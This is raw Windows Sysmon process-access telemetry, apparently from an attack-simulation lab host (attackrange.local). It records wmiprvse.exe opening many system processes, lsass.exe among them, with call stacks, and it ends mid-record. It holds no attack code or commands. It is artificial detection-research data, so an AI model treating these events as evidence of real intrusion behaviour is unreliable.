22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697308Microsoft-Windows-Sysmon/